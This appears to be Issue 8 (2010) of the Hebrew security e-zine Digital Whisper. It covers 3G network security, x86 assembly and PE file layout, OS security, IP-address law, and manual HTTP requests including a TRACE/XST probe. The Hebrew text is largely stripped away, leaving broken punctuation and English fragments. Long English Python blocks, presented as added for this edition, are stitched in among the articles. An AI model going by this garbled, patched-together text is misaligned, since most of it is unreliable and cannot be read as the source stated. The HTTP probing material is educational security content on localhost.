
Digital Whisper

Issue 8, 2010

:
:

, Ratinho ,

, , ," , ()Hyp3rInj3cT10n

Digital Whisper . Digital Whisper


. Digital Whisper/

. .

, , editor@digitalwhisper.co.il


www.DigitalWhisper.co.il
,8 2010


, , Digital Whisper .
, ,
/ .
.
( Digital Whisper )...
. ,
- ? ):
, -
!
( !)
. .
,
. " ( !)
( )Hyp3rInj3cT10n
.HTTP-
,
( )
.
!



3G MOBILE NETWORK SECURITY

PLAYING WITH HTTP



3G Mobile Network Security


()AGNil


. , (
) , . ,
. , -
-SMS . Apple
iPhone- , . ,
15,000 , .,
, .
, Google . " "Phone,Google-
,iPhone- .Google
, .
" : - ,
"!?Google . . ,Android
, ,
. , ,
, NEXUS1 ,HTC .Google
, ,
, .


. ,
, , .

? ?
? ?
, ( ) ,
" " . , ,
..


,
" " . " "
, ,
.
, ,
. :
" .1 " .70 -
, .
, .10Kbps-
" .2 " .90-
,CDMA ,GSM :.TDMA-
" " DATA - ,"
.200 Kbps
" .3 " ,
.1Mbps - , " "
, GSM .Wireless 3g GSM
WCDMA ,HSPA- CDMA .CDMA2000
" .4 " .2015
, ,wireless , .
IP
( , ," , messaging ,') .


?
:GSM

:
.1 - , ,PDA , .
( Base station System .2 )
.
- )BSC) Base Station Controller " -" ,
. , .
- Network Switching Subsystem .3 -
. , -
( PSTN ) , .
MMS ,SMS ,WAP .
-(MSC) Mobile Switching Center ,SMS , ,
' . , ,
.
-HLR GSM -
. SIM-
, .

VLR "" .
VLR , VLR .
, , '.

, . ,
. Google ...

:
- .
,Voice , ISP
. , ,
.
:

()http://www.iGR-inc.com :

ISP :
.1 , ,
.Denial of Service
SMS .
.2 ,
Blue-Tooth.
MMS .

,SPAM .3 , , ,
.
""
,IP- .
:

-
. , ,",MMS ,
.
( BS-Base Station -
) - ,
, .
DATA , .

. :


Serving SGSN-
.GPRS Support Node SGSN- )GPRS Tunneling Protocol( GTP
.GGSN- ,GGSN- .
GTP - ,
, , ,
"" . SGSN - ,GGSN -
GGSN- , , GGSN-.

( ,HLR ')
. ,SIP
( Voice Over IP VoIP) . Buffer
.Overflow

:
. ?
.1 , , .
, .
,ISP .
.2 -
-
. .
Firewall - . ,
, , .
Firewall .3 :
-Packet - Header-
.

-Session ,
.Session- ,"stateful inspection" : .

-Application
,L7- .

Firewall
. IDP ,
,DoS .


VPN .4 () GTP .
" .IPSec VPN , -
GGSN , ,"" .

?
. , ,
. ,
, , . ,
, , - -
.

.

, .
.
, .
.


.C++-
, - "" ( -)compilation
. cpp ,obj
Object Files . (Windows-
,)PE ()"symbols"-
. , ,

. :symbols
)1 ,
.
)2 ( ).
)3 .
, ( obj -) ,
.Linker ,
. Symbol , .
:

a.cpp

a.obj

b.cpp

p.exe

b.obj

obj .lib lib


.
. , obj - ( print ,)call


print ,
obj- . print
, print-
print . print ,
:
error LNK2019: unresolved external symbol "void __cdecl hello(void)" (?hello@@YAXXZ) referenced in function _main
)( hello .
,
.
.unresolved external symbol
, .
. symbols -
( )labels . Visual Studio-
","Assembler Output
Output Files . .
.


Windows- ,
. DOS ,
.COM .
: 16- 32-.
DOS ,
: 16 16 ,
16 .
16 ,

. ,

. ,
-
.
. 16 16
.
.
Windows ,
32 .
, multi tasking- .

. ,


,
. .
, 4GB
. .
,
. x86
. ,
.
x86
, .
.
.80686

,real mode -8086 ,1 MB 16.


-80186 .
,protected mode -80286 ,16 MB ,
.Windows 3.1
-80386 32 , ,4GB ,
.Windows NT
-80486 " "pipelining , .8K
-80686 .


, , ( Code
)Segment ( )Data Segment
. , .
, ( .)Stack
.
. ,C++-
, . ,
.

Low address
Code segment
Data segment
( Stack (Advancing up
High address



DOS
,DOS 16 + 16 ,
32 . : 20
16 ( .)MSB- :
,0xFFA4 ,0xFFA40 :
. 0x00BA : 0xFFAFA : 20.
, ,1K- ...
.
SS,CS :.DS-
-SS .
-CS .
-DS .
, -
.DS , .CS
push pop- SS - stack pointer-
.
DOS-
DOS
,PSP PSP- 0x100 : 256 : , .
81h : PSP- .80h
DS- PSP- .DOS DOS
.DS - CS
@data ,DS .
COM
, .
.
.
. ,
. , ,64K
.
PSP- ,0x100 : ,)instruction pointer( IP-
, ,0x100 : .
ORG 100h .100h
SS , 0xFFFF - 64K - .COM -
,COM ,
64K .


MZ EXE( DOS(
.
.)DS( DATA - IP .CS :
MZ .
. HEADER- 512 byte
" "header page .200h .
:MZ


- Code Segment
- Data Segment
, PSP-
. ,
" " .

MZ DOS:
()HEX
00-01
02-03
04-05
( 06-07)
08-09
14-15
( 18-19)
( 0E-0F)
( 10-11)
3C-3D

magic number MZ
( + ) . 0
512KB


,
.
IP . .

SS , DATA-
SP ,SS
PE ( ) . DOS
.0-

: 512KB Block( .16B Paragraph-)


=HEADER
DS :DOS ES- .PSP- SS- SP- "
. SS=CS , SP- 0xFFFF-
.



4 ( 2 = word) offset- -
.segment ( dynamic loader - )
. mov ax,@data 1B8 01 00- data segment-
0001 .
.01 00 00 00 ,0000:0001 B8
.01 00 dynamic linker-
, PSP- +
.PSP
Windows
FLAT MODEL32 bit
32bit flat model - ,
, 0:32 .offset paging
virtual memory- page .4KB page- .
12 20 .page .page-
1048576 ( .)pages 0- .
4GB . ( )2GB -
. 2GB- .

. .
) (DLL) Windows API-
Windows API- :
KERNEL32
USER32
GDI32
.DLL Windows NT 2GB
, . -
Windows NT DLL () .
, ,
.

B8 XX XX .mov ax,XXXX XXXX (.)immediate value



,
, page
. ,
.
:DLL
DLL - -lib
. user32.dll - , linker -
user32.lib external symbols- .DLL-
EXE WINDOWS PE/coff
,DOS - ()sections
Windows NT- .
+ DOS DOS .DOS stub
" ,"PE PE PE ( ,)optional ,
.

:
DOS
stub

+ MZ
( DOS )DOS stub
.
PE
)section headers( -
()sections

RVA :
Relative Virtual Address Image- . Image-
.Image Base

, .text
.
.text
.rdata
.data
.idata
.edata


read only data
( )
Import table DLL
Export table ( DLL )DLL


PE-
()HEX
117 - 114
11F - 11C

Address Of Entry
Point
Base Of Code

123 - 120

Base Of Data

127 - 124

Image Base

Image

Image

Image
,
Image

()Section Headers
, :

Virtual Address
Pointer To Raw Data
Characteristics

Image

. , ""
Section is executable | Section is readable

((Sections
)1000H( 4KB , Header- .
4KB- page .virtual memory-

PE
PE (.)header

PE - "( Base Address ") , , :
.40 00 00 00H . .
,
. )4 00H( 1024.
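The header fields listed above map directly onto a parser. The following Python is an added example written for this edition, not code from the article: it constructs a minimal PE32 image in memory (the byte layout is made up for the example and labelled as such in the code), walks it MZ header -> e_lfanew -> PE signature -> COFF header -> optional header -> section headers, and converts the entry-point RVA to a file offset and a virtual address. It also carries the real-mode segment:offset arithmetic from the DOS section (0xFFA4:0x00BA gives 0xFFAFA), so both address models of the article are in one place.

```python
import struct

# Section Characteristics bits the article's section-header table refers to
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000


def dos_linear(segment, offset):
    """Real-mode segment:offset -> 20-bit linear address (the 8086 wraps past 1 MB)."""
    return ((segment << 4) + offset) & 0xFFFFF


def build_sample_pe():
    """Constructed minimal PE32 image: 64-byte MZ header with no DOS stub, one .text section.
    It is test input for the parser, not a real or runnable binary."""
    dos = bytearray(0x40)
    # e_magic, e_cblp (bytes used in last page), e_cp (pages), e_crlc, e_cparhdr (header size in paragraphs)
    struct.pack_into("<2sHHHH", dos, 0x00, b"MZ", 0x40, 1, 0, 4)
    struct.pack_into("<HH", dos, 0x0E, 0x0000, 0x00B8)   # e_ss, e_sp
    struct.pack_into("<HH", dos, 0x14, 0x0000, 0x0000)   # e_ip, e_cs
    struct.pack_into("<H", dos, 0x18, 0x40)              # e_lfarlc (relocation table offset)
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew: PE signature follows immediately
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x0102)  # i386, 1 section, PE32 optional header
    opt = bytearray(0xE0)
    struct.pack_into("<HBB", opt, 0x00, 0x010B, 9, 0)    # Magic PE32, linker version
    struct.pack_into("<IIIIIII", opt, 0x04,
                     0x200, 0x200, 0,         # SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData
                     0x1000, 0x1000, 0x2000,  # AddressOfEntryPoint, BaseOfCode, BaseOfData (RVAs)
                     0x400000)                # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)    # SectionAlignment (one 4 KB page), FileAlignment
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0,
                       IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text


def parse_pe(data):
    """Walk MZ header -> e_lfanew -> PE signature -> COFF header -> optional header -> section headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ magic")
    e_cblp, e_cp, _e_crlc, e_cparhdr = struct.unpack_from("<HHHH", data, 0x02)
    e_ss, e_sp = struct.unpack_from("<HH", data, 0x0E)
    e_ip, e_cs = struct.unpack_from("<HH", data, 0x14)
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    entry, base_of_code, base_of_data, image_base, sec_align, file_align = \
        struct.unpack_from("<IIIIII", data, opt + 0x10)
    sections = []
    pos = opt + opt_size
    for _ in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, pos)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii"),
            "virtual_size": vsize, "virtual_address": vaddr,
            "raw_size": rawsize, "raw_ptr": rawptr,
            "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE),
            "readable": bool(flags & IMAGE_SCN_MEM_READ),
        })
        pos += 40
    # DOS-side size: e_cp pages of 512 bytes, the last one holding only e_cblp bytes when non-zero
    mz_size = (e_cp - 1) * 512 + e_cblp if e_cblp else e_cp * 512
    return {
        "mz_stub_size": mz_size, "dos_header_paragraphs": e_cparhdr,
        "dos_initial_ss_sp": (e_ss, e_sp), "dos_initial_cs_ip": (e_cs, e_ip),
        "e_lfanew": e_lfanew, "machine": machine,
        "entry_point": entry, "base_of_code": base_of_code, "base_of_data": base_of_data,
        "image_base": image_base, "section_alignment": sec_align, "file_alignment": file_align,
        "sections": sections,
    }


def rva_to_file_offset(pe, rva):
    """Map an RVA (image-relative) to a file offset through the section that contains it."""
    for s in pe["sections"]:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            return rva - s["virtual_address"] + s["raw_ptr"]
    raise ValueError("RVA 0x%x is not inside any section" % rva)


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print("entry VA 0x%x -> file offset 0x%x" % (pe["image_base"] + pe["entry_point"],
                                                rva_to_file_offset(pe, pe["entry_point"])))
    print("0xFFA4:0x00BA -> 0x%05X" % dos_linear(0xFFA4, 0x00BA))
```

The same parse_pe works on a real .exe read from disk; the only difference is that e_lfanew then points past a DOS stub and the MZ size fields describe that stub only, which is why Windows ignores them.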




.call
( )jump .
.ret , .
;
.
" " ( .)function frame
, ebp .
(.)Old ebp
:

()http://www.codeproject.com/KB/tips/stackdumper.aspx :
call ( Arg1-
.)Arg0 :
push 7
push 4
call func
add esp, 8

func is called with two int arguments, 7 and 4; after it returns, add esp, 8 removes the two 4-byte ints (8 bytes) from the stack, which is what the cdecl convention requires of the caller.



( ).
:
push ebp
mov ebp, esp
; function body
pop ebp
ret 0
With ebp set up this way:

- [ebp] holds the saved (old) ebp.

- [ebp-4] is the first local variable (locals grow downwards from ebp).

- [ebp+4] is the return address pushed by call.

- [ebp+4+i*4] is argument i (counting from 1), so the first argument is at [ebp+8].

, cdecl .
.

The common x86 conventions:

cdecl: arguments pushed on the stack right to left; the caller cleans up the stack.
stdcall: arguments pushed right to left; the callee cleans up.
fastcall: first two arguments in ECX and EDX, the rest on the stack; the callee cleans up.
thiscall: this is passed in ECX (MSVC, callee cleans up); GCC passes this as the first cdecl argument, so the caller cleans up.
Pascal: arguments pushed left to right; the callee cleans up.
Borland register (Delphi): first arguments in EAX, EDX, ECX, the rest on the stack; the callee cleans up.




.
( MASM32 ,)http://www.masm32.com/masmdl.htm :
.
:COM
ml /c /I"C:\masm32\include" dostest.asm
link16 /TINY dostest.obj
dostest.asm .
C:\masm32\include ( . .h- ,)C++
.
.lib
MZ :DOS
ml /c /I"C:\masm32\include" dostest.asm
link16 dostest.obj
:PE
ml /c /coff /Cp /I"C:\masm32\include" test1.asm
link /SUBSYSTEM:CONSOLE /RELEASE /LIBPATH:"E:\masm32\lib" test1.obj /OUT:test1.exe
link ,ml link16- .C:\masm32\bin
DOS
Windows . ,
( ,
) Windows , DOS .VM
,DOS BOX- .
- MODEL
MODEL ,
:
.MODEL [TYPE]
] [TYPE ," :
small
Tiny
flat

DOS .64Kb
,COM .
32 WINDOWS.



, .
" ,"The Art of Assembly Language:
http://www.arl.wustl.edu/~lockwood/class/cs306/books/artofasm/toc.html
:MSDN-
http://msdn.microsoft.com/en-us/magazine/cc301805.aspx o
http://msdn.microsoft.com/en-us/library/ms809762.aspx o
o
:CodeProject-
http://www.codeproject.com/KB/tips/stackdumper.aspx o
http://www.codeproject.com/KB/system/inject2exe.aspx o
:MZ
http://faydoc.tripod.com/formats/exe-DOS.htm o
http://davmac.org/davpage/doswin/dosexec.htm o

.
.
16- 32-
. , ,
. , ,
.
, .



?

, ,
. ,
,
. .
:
http://www.oriidan.info/article/thoughts
( ) , .

, ,
. ,
, . -
( . , ""
.
. - - ,
).
,
, .
, .
,
, ,
. .
,
, -
. , , ,
. :theregister-
http://www.theregister.co.uk/2004/10/22/security_report_windows_vs_linux
,
. :

. 16 , ,
, .

.
- , ( , , )
.
. , " "Windows
90% , ?
, .
, ,
,iPhone ,
BSD- . ,
.
?

, . , ,NetCraft
,
.FreeBSD , ' -
. .

,
, - .
, .
- ' , ,
. ,' .
" : " .
, , .
? ,
. , ,
- ! ,
( ) ( ).
, ,
, .
- .
Windows- " (

) , .
, .
, ,
.
,
.
, , .

, .
,
, ' . ,
.
,
.

.
, (".)"security by obscurity
, , ,
"" ,
.
-
, . ,
, .
,
, ,
...
.
? ,
, ,
.


. .
. ,
.


"
,
.
, , .
, "
.
, , ' ,
.
, , ,
. ,
, ;
, ( ,)Credentials ,
, ( OAuth ,OpenID
) . ?
,
, Bootstrapping . X X
, . ,
,Hotmail , , ,
; ,
, . ,
. , ;
, :
, ,
( ) . ,
Captcha .
, , , .
IP- , , . , ,
, , , :

( , ) .
: , ,



. . ,
, .
, :
, , .
; ,
IP- . ,IP ,
, (
) , . IP-
.
. 2005
IP . , -
, .
IP- ,
(" 4995/05
' ') . ,
; , , "" "-" ("
1238/07 ' ," 1752/06 ' ," 850/06 '
) , , Ynet-
(" 541/07 ' ) ,
(" (") 250/08 " '
") ,
( ( 2433/07 ")
` ") ,
( 1244/07 ' )
(" 11646/08 ' ) . ,
, . (
' ," ,)2008 .
75 ,
.
" " .IP
, ' ,
, ,
. " ' ,
( ,) , .
, ' , ,
-- , .



:

, .
, ,
,
( , , ) .
,
,
, .
- , , (
) , ,
.
.
, ,Proxy
.IP ,
,
IP ,
( 1806/09 ' ).
, , ,
.
(" 4447/07 ' )
.' , ,
:
" , ,
-
. -
.
,
".
.
, ,
.
,IP

.


,
, ,
, .
,
.
, , ( ,
) ,
.
. ,
, ,
Streaming .
, : IP- ,
,
; .
?2006-
? . , 2006-
. , ,2007
IP ,
IMEI ESN ,
. ,
.
, , .
, . ,

. ,
, . ,
, ,
.
, .



Playing With HTTP


()Hyp3rInj3cT10n

, , ,
- .
, , , .
, - .
HTTP
:
.1 ( )HTTP Request.
.2 , ( PHP, ASP, ASP.NET.)...
.3 ( HTML, CSS, JS.)...
.4 ( )HTTP Response .
.5 ( ) , .
?
( ).
.Firefox .
:PHP ,
!
, .


()HTTP Requests

:
[Request Method] [Destination File] [HTTP Version]
[Headers]
[Content]
- Request Method
HTTP , ( ):
- GET : , .
- POST ( , , .)...
- HEAD GET- , .
- OPTIONS .
- TRACE ,debugging- ( XST ).
- CONNECT .
- Destination File
:
http://www.roy.com/index.php?page=register&section=terms-of-use
, ( ,
):
/index.php?page=register&section=terms-of-use
- HTTP Version
:
HTTP/[Version]
:
HTTP/1.0
, :
HTTP/1.1


- Headers ()
.
:
[Name]: [Value]
[Name]: [Value]
[Name]: [Value]
[Name]: [Value]
(.)CRLF
= *( : )

* :Host ( Host- )IP


:Connection : ( )close ( .)keep-alive
, .
:Keep-Alive .
:User-Agent ( . ,useragentstring-
)
Accept ( :)Accept, Accept-Language, Accept-Charset, Accept-Encoding
.
:Referer . , .
:Cookie .
:Content-Type ,POST .
:Content-Length Content-.
, Cache - ,
. :
http://en.wikipedia.org/wiki/List_of_HTTP_headers#Requests


- Content
( ,)POST
. ,:
[Headers]

[Content]
()HTTP Responses

, , , .
. ( ) ,
. ,:
[HTTP Version] [Response Id] [Response Name]
[Headers]
[Content]
HTTP Version , .
HTTP Version- , Headers- Content- , .
Response IdResponse Name-
, (
) . ( )Response Id ()Response Name
. :
- OK, 200 .
- Moved Permanently ,301 .
- Not Modified ,304 ( Cache-
).
- Bad Request ,400 ( ).
- Unauthorized ,401 .
- Forbidden ,403 .
- Not Found ,404 .
- Method Not Allowed ,405 ( )Request Method .
- Internal Server Error ,500 .
- Not Implemented ,501 .
- Service Unavailable ,503 .


- Headers
, .
:
:Date .
:Server ( , , ') ,
.
HTTP Fingerprints ( cp77fk4r .)DigitalWhisper
,
.
:Last-Modified .
:Content-Length Content-.
:Connection .
:Content-Type Content-.
:Location ( . .)30x
HTTP Response Splitting.Open Redirection-

. :
http://en.wikipedia.org/wiki/List_of_HTTP_headers#Responses
- Content
, .
.
( ...HTML, CSS, JS- )
. Content-
,Length .
: HEAD ,Content -
Content-.


( )Web Browser
. Internet Explorer ,
.Windows ,
. , ,
, , , :

- Mozilla Firefox , .Mozilla ,


.
- Google Chrome . .
Safari ,Apple ):
Firefox
, .
, .
,
:
HeaderMonitor
Modify Headers
Header Spy
HeaderControl
HTTP Resource Test
HeaderGetter
OpenHeader
.
Live HTTP Headers
.
, , ,
. ,
.
, Firefox "" "."Live HTTP Headers
, . , .
" "Reply .
" "Save All
" ."Reply ,
. .
:
https://addons.mozilla.org/he/firefox/addon/3829


Tamper Data
, .,
( )Abort .
. .
- . .
.
- "Tamper Data" - ."Live HTTP Headers" -
Start Tamper . .
Tamper Data
. ,
.Tamper Data- .
, :
https://addons.mozilla.org/he/firefox/addon/966

GET/HEAD-
: GET .
HEAD GET- , (.)Headers
http://php.net :
GET / HTTP/1.1
Host: php.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: he,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
:
HTTP/1.x 200 OK
Date: Mon, 12 Oct 2009 17:27:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9RC3-dev
X-Powered-By: PHP/5.2.9RC3-dev

Last-Modified: Mon, 12 Oct 2009 18:50:22 GMT


Content-Language: en
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
HTML, CSS, JS....
" " ,
.
.) ( Content- HEAD-
POST-
( Forms / POST :
.)
:php.net echo
POST /search.php HTTP/1.1
Host: www.php.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: he,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://php.net/
Cookie: COUNTRY=ISR%2C ;LAST_LANG=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
pattern=echo&show=quickref&x=0&y=0
:
HTTP/1.x 302 Found
Date: Mon, 12 Oct 2009 17:28:58 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9RC3-dev
X-Powered-By: PHP/5.2.9RC3-dev
Content-Language: en

X-PHP-Load: 0.8916015625, 0.9599609375, 0.97265625


Location: http://il2.php.net/search.php?show=quickref&pattern=echo
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
HTML, CSS, JS' ,
. " "
.
OPTIONS-
OPTIONS :
OPTIONS /index.html HTTP/1.1
Host: 127.0.0.1
:
HTTP/1.1 200 OK
Date: Thu, 25 Mar 2010 13:43:04 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Content-Type: text/plain
:
Allow: GET,HEAD,POST,OPTIONS,TRACE
.
,
(
) . , 501
.Not Implemented
:
HTTP/1.1 405 Method Not Allowed
Date: Fri, 02 Apr 2010 11:42:20 GMT
Server: Apache/2.2.11 (Win32)
Allow: GET,HEAD,POST,OPTIONS,TRACE

Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /index.html.</p>
</body></html>
,PUT ,
.
TRACE-
! Debug TRACE :
: TRACE
TRACE /index.html HTTP/1.1
Host: 127.0.0.1
:
HTTP/1.1 200 OK
Date: Fri, 02 Apr 2010 11:41:20 GMT
Server: Apache/2.2.11 (Win32)
Transfer-Encoding: chunked
Content-Type: message/http
TRACE /index.html HTTP/1.1
Host: 127.0.0.1
. Content- ,
:
TRACE /index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Accept-Language: he,en-us;q=0.7,en;q=0.3

:
HTTP/1.1 200 OK
Date: Fri, 02 Apr 2010 11:50:03 GMT
Server: Apache/2.2.11 (Win32)
Transfer-Encoding: chunked
Content-Type: message/http

TRACE /index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Accept-Language: he,en-us;q=0.7,en;q=0.3
PHP-
, .
,PHP .
file_get_contents
:
<?php
echo file_get_contents('http://www.google.co.il/search?q=Hyp3rInj3ct10n');
?>
GET , (
).
.
http://il.php.net/file_get_contents :
,
( )//:http .


fsockopen-
.PHP fsockopen-
:GET
<?php
$socket = fsockopen('127.0.0.1',80);
if ( $socket )
{
$data = "GET /index.php?page=news HTTP/1.1\r\n";
$data .= "Host: 127.0.0.1\r\n\r\n";
fwrite($socket,$data);
while (!feof($socket))
echo fgets($socket,128);
fclose($socket);
}
?>
. :
) .GET- ( :HEAD
<?php
$socket = fsockopen('127.0.0.1',80);
if ( $socket ){
$data = "HEAD /index.php?page=news HTTP/1.1\r\n";
$data .= "Host: 127.0.0.1\r\n\r\n";
fwrite($socket,$data);
while (!feof($socket))
echo fgets($socket,128);
fclose($socket);
}
?>
) ( :POST
<?php
$socket = fsockopen('127.0.0.1',80);

if ( $socket ){
$data = "POST /post.php HTTP/1.1\r\n";
$data .= "Host: 127.0.0.1\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: he,en-us;q=0.7,en;q=0.3\r\n";
$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Keep-Alive: 115\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Referer: http://localhost/post.php\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: 19\r\n\r\n";
$data .= "nick=Hyp3rInj3cT10n";
fwrite($socket,$data);
while (!feof($socket))
echo fgets($socket,128);
fclose($socket);
}
?>
. OPTIONS TRACE ,
:
:TRACE
<?php
$socket = fsockopen('127.0.0.1',80);
if ( $socket )
{
$data = "TRACE /index.html HTTP/1.1\r\n";
$data .= "Host: 127.0.0.1\r\n\r\n";
fwrite($socket,$data);
while (!feof($socket))
echo fgets($socket,128);
fclose($socket);

}
?>
:OPTIONS
<?php
$socket = fsockopen('127.0.0.1',80);
if ( $socket )
{
    $data = "OPTIONS /index.html HTTP/1.1\r\n";
    $data .= "Host: 127.0.0.1\r\n\r\n";
    fwrite($socket,$data);
    while (!feof($socket))
        echo fgets($socket,128);
    fclose($socket);
}
?>
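To tie the request and response formats described earlier to the fsockopen examples above, here is an added Python example (not code from the article): it builds raw requests for any method with a Content-Length computed from the actual body, parses a response into status line, headers and body, decodes chunked transfer encoding (which the php.net replies used), and checks whether a TRACE reply reflects the request. The sample response is constructed for the example, modelled on the Apache 2.2.11 TRACE exchange shown above; send_raw is the only function that touches the network and is not used by the embedded test data.

```python
import socket

CRLF = b"\r\n"


def build_request(method, path, host, headers=None, body=b"", version="HTTP/1.1"):
    """Serialise a raw request in the form the article shows: request line, Host, headers,
    blank line, body. Content-Length is derived from the real body so it is never stale."""
    if isinstance(body, str):
        body = body.encode("utf-8")
    lines = [f"{method} {path} {version}", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    if body:
        lines.append(f"Content-Length: {len(body)}")
    head = CRLF.join(line.encode("latin-1") for line in lines)
    return head + CRLF + CRLF + body


def dechunk(body):
    """Decode a Transfer-Encoding: chunked body: hex size line, data, CRLF, ..., a 0-size chunk."""
    out, pos = bytearray(), 0
    while True:
        line_end = body.index(CRLF, pos)
        size = int(body[pos:line_end].split(b";")[0], 16)   # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2                                     # skip the data and its trailing CRLF


def parse_response(raw):
    """Split status line, headers (lower-cased names, repeated headers kept as a list) and body;
    un-chunk the body when the server said so."""
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("response head not terminated")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    if "chunked" in [v.lower() for v in headers.get("transfer-encoding", [])]:
        body = dechunk(body)
    return {"version": parts[0], "status": int(parts[1]),
            "reason": parts[2] if len(parts) > 2 else "",
            "headers": headers, "body": body}


def trace_reflected(request, response):
    """XST precondition: the server answered TRACE with 200, message/http, and echoed our request."""
    ctype = response["headers"].get("content-type", [""])[0].lower()
    return (response["status"] == 200 and ctype.startswith("message/http")
            and request.rstrip(CRLF) in response["body"])


def send_raw(host, port, request, timeout=5.0):
    """Send a raw request over TCP and read until the server closes the connection
    (pass headers={"Connection": "close"} so an HTTP/1.1 server does close it)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                return b"".join(chunks)
            chunks.append(data)


def sample_trace_response(request):
    """Constructed reply modelled on the article's Apache 2.2.11 TRACE exchange; not a captured packet."""
    return (b"HTTP/1.1 200 OK\r\n"
            b"Date: Fri, 02 Apr 2010 11:41:20 GMT\r\n"
            b"Server: Apache/2.2.11 (Win32)\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"Content-Type: message/http\r\n\r\n"
            + b"%x\r\n" % len(request) + request + b"\r\n0\r\n\r\n")


if __name__ == "__main__":
    req = build_request("TRACE", "/index.html", "127.0.0.1")
    resp = parse_response(sample_trace_response(req))
    print(resp["status"], resp["reason"], "TRACE reflected:", trace_reflected(req, resp))
```

Against a live host the same check is `trace_reflected(req, parse_response(send_raw(host, 80, req)))`; a 405 or 501 reply, or a body that does not contain the request, means TRACE is not usable for XST on that server.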
,
,
. .

. , ,
.
? ,
. ,
.
( POST ) .
:
POST /login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: he,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://localhost/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
username=Hyp3rInj3cT10n&password=45h6ff2&send=Login
:
HTTP/1.1 200 OK
Date: Fri, 26 Mar 2010 14:03:21 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
